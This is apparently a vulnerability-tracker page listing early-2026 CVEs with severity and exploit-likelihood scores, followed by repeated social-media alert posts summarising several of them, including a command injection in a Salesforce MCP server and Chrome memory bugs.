| CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
|---|---|---|---|---|---|---|---|
| CVE-2026-26029 | 7.5 | 0.00% | 2 | 0 | 2026-02-11T22:15:52.373000 | sf-mcp-server is an implementation of Salesforce MCP server for Claude for Deskt | |
| CVE-2026-21537 | 8.8 | 0.05% | 2 | 0 | 2026-02-11T21:50:25.840000 | Improper control of generation of code ('code injection') in Microsoft Defender | |
| CVE-2026-21256 | 8.8 | 0.05% | 2 | 0 | 2026-02-11T21:37:01.630000 | Improper neutralization of special elements used in a command ('command injectio | |
| CVE-2026-2315 | 8.8 | 0.00% | 2 | 0 | 2026-02-11T21:30:48 | Inappropriate implementation in WebGPU in Google Chrome prior to 145.0.7632.45 a | |
| CVE-2026-2313 | 8.8 | 0.00% | 2 | 0 | 2026-02-11T21:30:48 | Use after free in CSS in Google Chrome prior to 145.0.7632.45 allowed a remote a | |
| CVE-2026-2319 | 7.5 | 0.00% | 2 | 0 | 2026-02-11T21:30:48 | Race in DevTools in Google Chrome prior to 145.0.7632.45 allowed a remote attack | |
| CVE-2026-26010 | 7.6 | 0.00% | 2 | 0 | 2026-02-11T21:16:21.117000 | OpenMetadata is a unified metadata platform. Prior to 1.11.8, calls issued by th | |
| CVE-2026-25924 | 8.4 | 0.00% | 2 | 0 | 2026-02-11T21:16:19.283000 | Kanboard is project management software focused on Kanban methodology. Prior to | |
| CVE-2026-25759 | 8.7 | 0.00% | 2 | 0 | 2026-02-11T21:16:19.097000 | Statmatic is a Laravel and Git powered content management system (CMS). From 6.0 | |
| CVE-2025-64487 | 7.6 | 0.00% | 2 | 0 | 2026-02-11T21:16:17.757000 | Outline is a service that allows for collaborative documentation. Prior to 1.1.0 | |
| CVE-2026-21246 | 7.8 | 0.02% | 2 | 0 | 2026-02-11T20:36:58.373000 | Heap-based buffer overflow in Microsoft Graphics Component allows an authorized | |
| CVE-2026-21250 | 7.8 | 0.04% | 2 | 0 | 2026-02-11T19:49:34.573000 | Untrusted pointer dereference in Windows HTTP.sys allows an authorized attacker | |
| CVE-2026-2314 | 8.8 | 0.00% | 2 | 0 | 2026-02-11T19:15:51.427000 | Heap buffer overflow in Codecs in Google Chrome prior to 145.0.7632.45 allowed a | |
| CVE-2026-21259 | 7.8 | 0.04% | 2 | 0 | 2026-02-11T19:12:00.613000 | Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized atta | |
| CVE-2026-21260 | 7.5 | 0.08% | 2 | 0 | 2026-02-11T19:10:20.090000 | Exposure of sensitive information to an unauthorized actor in Microsoft Office O | |
| CVE-2026-21511 | 7.5 | 0.26% | 2 | 0 | 2026-02-11T18:56:56.907000 | Deserialization of untrusted data in Microsoft Office Outlook allows an unauthor | |
| CVE-2026-21357 | 7.8 | 0.01% | 2 | 0 | 2026-02-11T18:32:31 | InDesign Desktop versions 21.1, 20.5.1 and earlier are affected by a Heap-based | |
| CVE-2026-2360 | 8.1 | 0.00% | 2 | 0 | 2026-02-11T18:31:37 | PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superu | |
| CVE-2026-0229 | None | 0.00% | 2 | 0 | 2026-02-11T18:31:37 | A denial-of-service (DoS) vulnerability in the Advanced DNS Security (ADNS) feat | |
| CVE-2026-23715 | 7.8 | 0.01% | 1 | 0 | 2026-02-11T18:24:46.720000 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-23716 | 7.8 | 0.01% | 1 | 0 | 2026-02-11T18:24:30.713000 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-23717 | 7.8 | 0.01% | 1 | 0 | 2026-02-11T18:24:15.437000 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-23718 | 7.8 | 0.01% | 2 | 0 | 2026-02-11T18:24:00.490000 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-2361 | 8.0 | 0.00% | 2 | 0 | 2026-02-11T18:16:08.313000 | PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superu | |
| CVE-2026-0228 | 0 | 0.00% | 2 | 0 | 2026-02-11T18:16:07.720000 | An improper certificate validation vulnerability in PAN-OS allows users to conne | |
| CVE-2025-64075 | 10.0 | 0.00% | 2 | 0 | 2026-02-11T18:06:04.010000 | A path traversal vulnerability in the check_token function of Shenzhen Zhibotong | |
| CVE-2026-25084 | 9.8 | 0.00% | 4 | 0 | 2026-02-11T18:06:04.010000 | Authentication for ZLAN5143D can be bypassed by directly accessing internal URLs | |
| CVE-2026-24789 | 9.8 | 0.00% | 4 | 0 | 2026-02-11T18:06:04.010000 | An unprotected API endpoint allows an attacker to remotely change the device pas | |
| CVE-2026-23720 | 7.8 | 0.01% | 1 | 0 | 2026-02-11T17:58:50.067000 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-21329 | 7.8 | 0.01% | 2 | 0 | 2026-02-11T17:39:54.840000 | After Effects versions 25.6 and earlier are affected by a Use After Free vulnera | |
| CVE-2026-21321 | 7.8 | 0.01% | 2 | 0 | 2026-02-11T17:37:29.543000 | After Effects versions 25.6 and earlier are affected by an Integer Overflow or W | |
| CVE-2026-21323 | 7.8 | 0.01% | 2 | 0 | 2026-02-11T17:37:04.913000 | After Effects versions 25.6 and earlier are affected by a Use After Free vulnera | |
| CVE-2026-21324 | 7.8 | 0.01% | 2 | 0 | 2026-02-11T17:36:45.697000 | After Effects versions 25.6 and earlier are affected by an out-of-bounds read vu | |
| CVE-2026-21326 | 7.8 | 0.01% | 2 | 0 | 2026-02-11T17:36:27.173000 | After Effects versions 25.6 and earlier are affected by a Use After Free vulnera | |
| CVE-2026-21335 | 7.8 | 0.01% | 2 | 0 | 2026-02-11T17:31:16.753000 | Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bou | |
| CVE-2026-21345 | 7.8 | 0.03% | 2 | 0 | 2026-02-11T17:15:24.487000 | Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds | |
| CVE-2026-21346 | 7.8 | 0.03% | 2 | 0 | 2026-02-11T17:15:14.187000 | Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds writ | |
| CVE-2026-21342 | 7.8 | 0.01% | 2 | 0 | 2026-02-11T16:40:22.233000 | Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds | |
| CVE-2026-25646 | 0 | 0.04% | 1 | 0 | 2026-02-11T16:16:06.403000 | LIBPNG is a reference library for use in applications that read, create, and man | |
| CVE-2026-25577 | 7.5 | 0.05% | 2 | 0 | 2026-02-11T16:16:06.200000 | Emmett is a framework designed to simplify your development process. Prior to 1. | |
| CVE-2026-1235 | 6.5 | 0.01% | 1 | 0 | 2026-02-11T16:16:03.583000 | The WP eCommerce WordPress plugin through 3.15.1 unserializes user input via aja | |
| CVE-2026-21312 | 7.8 | 0.01% | 2 | 0 | 2026-02-11T15:57:42.060000 | Audition versions 25.3 and earlier are affected by an out-of-bounds write vulner | |
| CVE-2026-21525 | 6.2 | 8.55% | 10 | 0 | 2026-02-11T15:43:43.057000 | Null pointer dereference in Windows Remote Access Connection Manager allows an u | |
| CVE-2026-24061 | 9.8 | 36.95% | 6 | 62 | template | 2026-02-11T15:40:42.937000 | telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a " |
| CVE-2026-21513 | 8.8 | 8.83% | 12 | 0 | 2026-02-11T15:38:13.670000 | Protection mechanism failure in MSHTML Framework allows an unauthorized attacker | |
| CVE-2025-8025 | 9.8 | 0.00% | 2 | 0 | 2026-02-11T15:27:26.370000 | Missing Authentication for Critical Function, Improper Access Control vulnerabil | |
| CVE-2026-0910 | 8.8 | 0.00% | 2 | 0 | 2026-02-11T15:27:26.370000 | The wpForo Forum plugin for WordPress is vulnerable to PHP Object Injection in a | |
| CVE-2025-8668 | 9.4 | 0.00% | 2 | 0 | 2026-02-11T15:27:26.370000 | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site | |
| CVE-2025-12059 | 9.8 | 0.00% | 2 | 0 | 2026-02-11T15:27:26.370000 | Insertion of Sensitive Information into Externally-Accessible File or Directory | |
| CVE-2025-48503 | 7.8 | 0.00% | 2 | 0 | 2026-02-11T15:27:26.370000 | A DLL hijacking vulnerability in the AMD Software Installer could allow an attac | |
| CVE-2026-2250 | 7.5 | 0.00% | 2 | 0 | 2026-02-11T15:27:26.370000 | The /dbviewer/ web endpoint in METIS WIC devices is exposed without authenticati | |
| CVE-2026-2249 | 9.8 | 0.00% | 2 | 1 | 2026-02-11T15:27:26.370000 | METIS DFS devices (versions <= oscore 2.1.234-r18) expose a web-based shell at t | |
| CVE-2026-2248 | 9.8 | 0.00% | 2 | 1 | 2026-02-11T15:27:26.370000 | METIS WIC devices (versions <= oscore 2.1.234-r18) expose a web-based shell at t | |
| CVE-2026-1560 | 8.8 | 0.24% | 1 | 1 | 2026-02-11T15:27:26.370000 | The Custom Block Builder – Lazy Blocks plugin for WordPress is vulnerable to Rem | |
| CVE-2026-1357 | 9.8 | 0.46% | 2 | 3 | 2026-02-11T15:27:26.370000 | The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress | |
| CVE-2026-20841 | 8.8 | 0.08% | 101 | 3 | 2026-02-11T15:16:16.997000 | Improper neutralization of special elements used in a command ('command injectio | |
| CVE-2025-52436 | 8.8 | 0.14% | 1 | 0 | 2026-02-10T21:52:01.987000 | An Improper Neutralization of Input During Web Page Generation ('Cross-site Scri | |
| CVE-2026-22153 | 8.1 | 0.07% | 1 | 0 | 2026-02-10T21:51:48.077000 | An Authentication Bypass by Primary Weakness vulnerability [CWE-305] vulnerabili | |
| CVE-2026-25993 | 0 | 0.03% | 1 | 0 | 2026-02-10T21:51:48.077000 | EverShop is a TypeScript-first eCommerce platform. During category update and de | |
| CVE-2026-25947 | 8.8 | 0.03% | 2 | 0 | 2026-02-10T21:51:48.077000 | Worklenz is a project management tool. Prior to 2.1.7, there are multiple SQL in | |
| CVE-2026-1848 | 7.5 | 0.04% | 2 | 0 | 2026-02-10T21:51:48.077000 | Connections received from the proxy port may not count towards total accepted co | |
| CVE-2026-21352 | 7.8 | 0.03% | 2 | 0 | 2026-02-10T21:51:48.077000 | DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write v | |
| CVE-2026-1507 | 7.5 | 0.05% | 2 | 0 | 2026-02-10T21:51:48.077000 | The affected products are vulnerable to an uncaught exception that could allow a | |
| CVE-2026-21349 | 7.8 | 0.03% | 2 | 0 | 2026-02-10T21:51:48.077000 | Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds wri | |
| CVE-2026-1602 | 6.5 | 0.05% | 2 | 0 | 2026-02-10T21:51:48.077000 | SQL injection in Ivanti Endpoint Manager before version 2024 SU5 allows a remote | |
| CVE-2026-21344 | 7.8 | 0.03% | 2 | 0 | 2026-02-10T21:31:42 | Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds | |
| CVE-2026-21347 | 7.8 | 0.03% | 2 | 0 | 2026-02-10T21:31:41 | Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow o | |
| CVE-2026-21353 | 7.8 | 0.03% | 2 | 0 | 2026-02-10T21:31:41 | DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or W | |
| CVE-2026-21341 | 7.8 | 0.03% | 2 | 0 | 2026-02-10T21:31:37 | Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds | |
| CVE-2026-21343 | 7.8 | 0.03% | 2 | 0 | 2026-02-10T21:31:36 | Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds | |
| CVE-2026-21514 | 7.8 | 6.65% | 12 | 0 | 2026-02-10T21:31:29 | Reliance on untrusted inputs in a security decision in Microsoft Office Word all | |
| CVE-2026-21510 | 8.8 | 6.40% | 13 | 0 | 2026-02-10T21:31:29 | Protection mechanism failure in Windows Shell allows an unauthorized attacker to | |
| CVE-2026-21519 | 7.8 | 1.67% | 11 | 0 | 2026-02-10T21:31:29 | Access of resource using incompatible type ('type confusion') in Desktop Window | |
| CVE-2026-21533 | 7.8 | 1.55% | 11 | 2 | 2026-02-10T21:31:29 | Improper privilege management in Windows Remote Desktop allows an authorized att | |
| CVE-2026-25992 | 7.5 | 0.04% | 2 | 0 | 2026-02-10T19:56:57 | # File Read Interface Case Bypass Vulnerability ## Vulnerability Name File Read | |
| CVE-2026-21531 | 9.8 | 0.16% | 3 | 1 | 2026-02-10T18:30:54 | Deserialization of untrusted data in Azure SDK allows an unauthorized attacker t | |
| CVE-2026-25611 | 7.5 | 0.04% | 2 | 0 | 2026-02-10T18:30:54 | A series of specifically crafted, unauthenticated messages can exhaust available | |
| CVE-2026-21328 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:53 | After Effects versions 25.6 and earlier are affected by an out-of-bounds write v | |
| CVE-2026-21322 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:52 | After Effects versions 25.6 and earlier are affected by an out-of-bounds read vu | |
| CVE-2026-21318 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:52 | After Effects versions 25.6 and earlier are affected by an out-of-bounds write v | |
| CVE-2026-21330 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:52 | After Effects versions 25.6 and earlier are affected by an Access of Resource Us | |
| CVE-2026-21327 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:52 | After Effects versions 25.6 and earlier are affected by an out-of-bounds write v | |
| CVE-2026-21251 | 7.8 | 0.04% | 2 | 0 | 2026-02-10T18:30:51 | Use after free in Windows Cluster Client Failover allows an authorized attacker | |
| CVE-2026-21320 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:51 | After Effects versions 25.6 and earlier are affected by a Use After Free vulnera | |
| CVE-2026-21351 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:51 | After Effects versions 25.6 and earlier are affected by a Use After Free vulnera | |
| CVE-2026-21257 | 8.0 | 0.05% | 2 | 0 | 2026-02-10T18:30:50 | Improper neutralization of special elements used in a command ('command injectio | |
| CVE-2026-21255 | 8.8 | 0.03% | 2 | 0 | 2026-02-10T18:30:50 | Improper access control in Windows Hyper-V allows an authorized attacker to bypa | |
| CVE-2026-21325 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:50 | After Effects versions 25.6 and earlier are affected by an out-of-bounds read vu | |
| CVE-2026-21334 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:50 | Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bou | |
| CVE-2026-21516 | 8.8 | 0.04% | 2 | 0 | 2026-02-10T18:30:50 | Improper neutralization of special elements used in a command ('command injectio | |
| CVE-2026-1603 | 8.6 | 0.15% | 2 | 0 | 2026-02-10T18:30:49 | An authentication bypass in Ivanti Endpoint Manager before version 2024 SU5 allo | |
| CVE-2025-6967 | 8.7 | 0.02% | 4 | 0 | 2026-02-10T15:30:34 | Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technol | |
| CVE-2026-0509 | 9.6 | 0.04% | 5 | 0 | 2026-02-10T15:22:54.740000 | SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, | |
| CVE-2026-22923 | 7.8 | 0.01% | 1 | 0 | 2026-02-10T15:22:54.740000 | A vulnerability has been identified in NX (All versions < V2512). The affected a | |
| CVE-2025-11242 | 9.8 | 0.04% | 1 | 0 | 2026-02-10T15:22:54.740000 | Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems S | |
| CVE-2026-2094 | 8.8 | 0.08% | 2 | 0 | 2026-02-10T15:22:54.740000 | Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authe | |
| CVE-2026-2095 | 9.8 | 0.17% | 1 | 0 | 2026-02-10T15:22:54.740000 | Agentflow developed by Flowring has an Authentication Bypass vulnerability, allo | |
| CVE-2026-2093 | 7.5 | 0.05% | 1 | 0 | 2026-02-10T15:22:54.740000 | Docpedia developed by Flowring has a SQL Injection vulnerability, allowing unaut | |
| CVE-2026-0490 | 7.5 | 0.08% | 1 | 0 | 2026-02-10T15:22:54.740000 | SAP BusinessObjects BI Platform allows an unauthenticated attacker to craft a sp | |
| CVE-2026-24322 | 7.7 | 0.03% | 2 | 0 | 2026-02-10T15:22:54.740000 | SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perf | |
| CVE-2026-0485 | 7.5 | 0.04% | 1 | 0 | 2026-02-10T15:22:54.740000 | SAP BusinessObjects BI Platform allows an unauthenticated attacker to send speci | |
| CVE-2026-24684 | 7.5 | 0.04% | 2 | 0 | 2026-02-10T15:02:32.033000 | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0 | |
| CVE-2026-25751 | 7.5 | 0.02% | 2 | 0 | 2026-02-10T14:33:38.680000 | FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An inf | |
| CVE-2026-25752 | 9.1 | 0.04% | 2 | 0 | 2026-02-10T14:31:52.450000 | FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An aut | |
| CVE-2026-25656 | 7.8 | 0.01% | 1 | 0 | 2026-02-10T12:30:34 | A vulnerability has been identified in SINEC NMS (All versions), User Management | |
| CVE-2026-2268 | 7.5 | 0.06% | 1 | 1 | 2026-02-10T12:30:34 | The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Expo | |
| CVE-2026-25655 | 7.8 | 0.01% | 1 | 0 | 2026-02-10T12:30:33 | A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP2). The | |
| CVE-2026-23719 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:28 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2025-40587 | 7.6 | 0.02% | 2 | 0 | 2026-02-10T12:30:27 | A vulnerability has been identified in Polarion V2404 (All versions < V2404.5), | |
| CVE-2026-2097 | 8.8 | 0.21% | 3 | 0 | 2026-02-10T09:30:31 | Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allo | |
| CVE-2026-2096 | 9.8 | 0.13% | 3 | 0 | 2026-02-10T09:30:31 | Agentflow developed by Flowring has a Missing Authentication vulnerability, allo | |
| CVE-2026-23687 | 8.8 | 0.05% | 5 | 0 | 2026-02-10T06:30:45 | SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated | |
| CVE-2026-23689 | 7.7 | 0.07% | 1 | 0 | 2026-02-10T06:30:44 | Due to an uncontrolled resource consumption (Denial of Service) vulnerability, a | |
| CVE-2025-11547 | 7.8 | 0.01% | 1 | 0 | 2026-02-10T06:30:40 | AXIS Camera Station Pro contained a flaw to perform a privilege escalation attac | |
| CVE-2026-0488 | 10.0 | 0.04% | 3 | 0 | 2026-02-10T06:30:38 | An authenticated attacker in SAP CRM and SAP S/4HANA (Scripting Editor) could ex | |
| CVE-2026-1529 | 8.1 | 0.02% | 2 | 2 | 2026-02-10T02:15:52.253000 | A flaw was found in Keycloak. An attacker can exploit this vulnerability by modi | |
| CVE-2025-15310 | 7.8 | 0.02% | 1 | 0 | 2026-02-10T00:30:37 | Tanium addressed a local privilege escalation vulnerability in Patch Endpoint To | |
| CVE-2026-25639 | 7.5 | 0.01% | 1 | 0 | 2026-02-09T21:55:30.093000 | Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.13. | |
| CVE-2026-1731 | 0 | 3.57% | 2 | 3 | template | 2026-02-09T16:08:55.263000 | BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote |
| CVE-2026-2234 | 9.1 | 0.05% | 2 | 0 | 2026-02-09T16:08:35.290000 | C&Cm@il developed by HGiga has a Missing Authentication vulnerability, allowing | |
| CVE-2025-64175 | 0 | 0.01% | 2 | 0 | 2026-02-06T21:57:22.450000 | Gogs is an open source self-hosted Git service. In version 0.13.3 and prior, Gog | |
| CVE-2025-64111 | 0 | 0.09% | 2 | 0 | 2026-02-06T21:57:22.450000 | Gogs is an open source self-hosted Git service. In version 0.13.3 and prior, due | |
| CVE-2026-0227 | 7.5 | 0.06% | 2 | 2 | 2026-02-06T17:37:28.723000 | A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated | |
| CVE-2026-21643 | 9.8 | 0.13% | 5 | 0 | 2026-02-06T15:14:47.703000 | An improper neutralization of special elements used in an sql command ('sql inje | |
| CVE-2026-25049 | 9.9 | 0.03% | 4 | 1 | 2026-02-05T20:22:47.870000 | n8n is an open source workflow automation platform. Prior to versions 1.123.17 a | |
| CVE-2025-24054 | 6.5 | 11.25% | 1 | 9 | 2026-02-04T21:31:24 | External control of file name or path in Windows NTLM allows an unauthorized att | |
| CVE-2026-20119 | 7.5 | 0.09% | 2 | 0 | 2026-02-04T18:30:51 | A vulnerability in the text rendering subsystem of Cisco TelePresence Collaborat | |
| CVE-2026-1340 | 9.8 | 0.18% | 1 | 1 | 2026-02-04T16:34:21.763000 | A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve | |
| CVE-2025-40551 | 9.8 | 54.99% | 1 | 0 | template | 2026-02-03T21:31:50 | SolarWinds Web Help Desk was found to be susceptible to an untrusted data deseri |
| CVE-2026-1281 | 9.8 | 16.41% | 1 | 1 | 2026-01-30T00:31:29 | A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve | |
| CVE-2015-10145 | 8.8 | 0.10% | 2 | 0 | 2026-01-29T16:53:56.950000 | Gargoyle router management utility versions 1.5.x contain an authenticated OS co | |
| CVE-2025-15467 | 9.8 | 0.66% | 2 | 4 | 2026-01-29T15:31:31 | Issue summary: Parsing CMS AuthEnvelopedData message with maliciously crafted AE | |
| CVE-2026-24476 | 0 | 0.03% | 1 | 0 | 2026-01-27T14:59:34.073000 | Shaarli is a personal bookmarking service. Prior to version 0.16.0, crafting a m | |
| CVE-2026-20817 | 7.8 | 0.06% | 1 | 0 | 2026-01-14T20:31:32.760000 | Improper handling of insufficient permissions or privileges in Windows Error Rep | |
| CVE-2026-20027 | 5.3 | 0.04% | 2 | 0 | 2026-01-07T18:30:33 | Multiple Cisco products are affected by a vulnerability in the processing of DCE | |
| CVE-2026-20026 | 5.8 | 0.13% | 2 | 0 | 2026-01-07T18:30:33 | Multiple Cisco products are affected by a vulnerability in the processing o | |
| CVE-2025-43529 | 8.8 | 0.03% | 2 | 7 | 2025-12-17T21:31:01 | A use-after-free issue was addressed with improved memory management. This issue | |
| CVE-2025-14174 | 8.8 | 0.65% | 2 | 6 | 2025-12-15T15:30:31 | Out of bounds memory access in ANGLE in Google Chrome on Mac prior to 143.0.7499 | |
| CVE-2025-8088 | 8.8 | 3.90% | 2 | 28 | 2025-10-30T15:50:59.680000 | A path traversal vulnerability affecting the Windows version of WinRAR allows th | |
| CVE-2018-0802 | 7.8 | 93.89% | 2 | 7 | 2025-10-28T14:14:01.610000 | Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Offic | |
| CVE-2025-53770 | 9.8 | 89.20% | 2 | 47 | template | 2025-10-27T17:12:40.607000 | Deserialization of untrusted data in on-premises Microsoft SharePoint Server all |
| CVE-2023-4911 | 7.8 | 73.04% | 1 | 17 | template | 2025-10-22T00:32:52 | A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so whi |
| CVE-2025-60787 | 7.2 | 40.20% | 1 | 1 | 2025-10-10T16:22:30.703000 | MotionEye v0.43.1b4 and before is vulnerable to OS Command Injection in configur | |
| CVE-2025-26399 | 9.8 | 12.86% | 2 | 1 | 2025-09-23T06:30:33 | SolarWinds Web Help Desk was found to be susceptible to an unauthenticated AjaxP | |
| CVE-2025-59375 | 7.5 | 0.12% | 1 | 0 | 2025-09-17T15:31:32 | libexpat in Expat before 2.7.2 allows attackers to trigger large dynamic memory | |
| CVE-2025-3573 | 6.1 | 0.25% | 2 | 0 | 2025-04-15T18:39:27.967000 | Versions of the package jquery-validation before 1.20.0 are vulnerable to Cross- | |
| CVE-2026-20700 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2026-26009 | 0 | 0.26% | 3 | 0 | N/A | ||
| CVE-2026-21523 | 0 | 0.04% | 2 | 0 | N/A | ||
| CVE-2026-25506 | 0 | 0.02% | 2 | 0 | N/A | ||
| CVE-2026-24682 | 0 | 0.04% | 2 | 0 | N/A | ||
| CVE-2026-23876 | 0 | 0.06% | 1 | 0 | N/A | ||
| CVE-2026-25931 | 0 | 0.01% | 1 | 0 | N/A |
updated 2026-02-11T22:15:52.373000
2 posts
🟠 CVE-2026-26029 - High (7.5)
sf-mcp-server is an implementation of Salesforce MCP server for Claude for Desktop. A command injection vulnerability exists in sf-mcp-server due to unsafe use of child_process.exec when constructing Salesforce CLI commands with user-controlled in...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26029/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-26029 - High (7.5)
sf-mcp-server is an implementation of Salesforce MCP server for Claude for Desktop. A command injection vulnerability exists in sf-mcp-server due to unsafe use of child_process.exec when constructing Salesforce CLI commands with user-controlled in...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26029/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T21:50:25.840000
2 posts
🟠 CVE-2026-21537 - High (8.8)
Improper control of generation of code ('code injection') in Microsoft Defender for Linux allows an unauthorized attacker to execute code over an adjacent network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21537/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21537 - High (8.8)
Improper control of generation of code ('code injection') in Microsoft Defender for Linux allows an unauthorized attacker to execute code over an adjacent network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21537/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T21:37:01.630000
2 posts
🟠 CVE-2026-21256 - High (8.8)
Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an unauthorized attacker to execute code over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21256/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21256 - High (8.8)
Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an unauthorized attacker to execute code over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21256/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T21:30:48
2 posts
🟠 CVE-2026-2315 - High (8.8)
Inappropriate implementation in WebGPU in Google Chrome prior to 145.0.7632.45 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2315/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2315 - High (8.8)
Inappropriate implementation in WebGPU in Google Chrome prior to 145.0.7632.45 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2315/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T21:30:48
2 posts
🟠 CVE-2026-2313 - High (8.8)
Use after free in CSS in Google Chrome prior to 145.0.7632.45 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2313/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2313 - High (8.8)
Use after free in CSS in Google Chrome prior to 145.0.7632.45 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2313/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T21:30:48
2 posts
🟠 CVE-2026-2319 - High (7.5)
Race in DevTools in Google Chrome prior to 145.0.7632.45 allowed a remote attacker who convinced a user to engage in specific UI gestures and install a malicious extension to potentially exploit object corruption via a malicious file. (Chromium se...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2319/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2319 - High (7.5)
Race in DevTools in Google Chrome prior to 145.0.7632.45 allowed a remote attacker who convinced a user to engage in specific UI gestures and install a malicious extension to potentially exploit object corruption via a malicious file. (Chromium se...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2319/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T21:16:21.117000
2 posts
🟠 CVE-2026-26010 - High (7.6)
OpenMetadata is a unified metadata platform. Prior to 1.11.8, calls issued by the UI against /api/v1/ingestionPipelines leak JWTs used by ingestion-bot for certain services (Glue / Redshift / Postgres). Any read-only user can gain access to a high...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26010/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-26010 - High (7.6)
OpenMetadata is a unified metadata platform. Prior to 1.11.8, calls issued by the UI against /api/v1/ingestionPipelines leak JWTs used by ingestion-bot for certain services (Glue / Redshift / Postgres). Any read-only user can gain access to a high...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26010/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T21:16:19.283000
2 posts
🟠 CVE-2026-25924 - High (8.4)
Kanboard is project management software focused on Kanban methodology. Prior to 1.2.50, a security control bypass vulnerability in Kanboard allows an authenticated administrator to achieve full Remote Code Execution (RCE). Although the application...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25924/
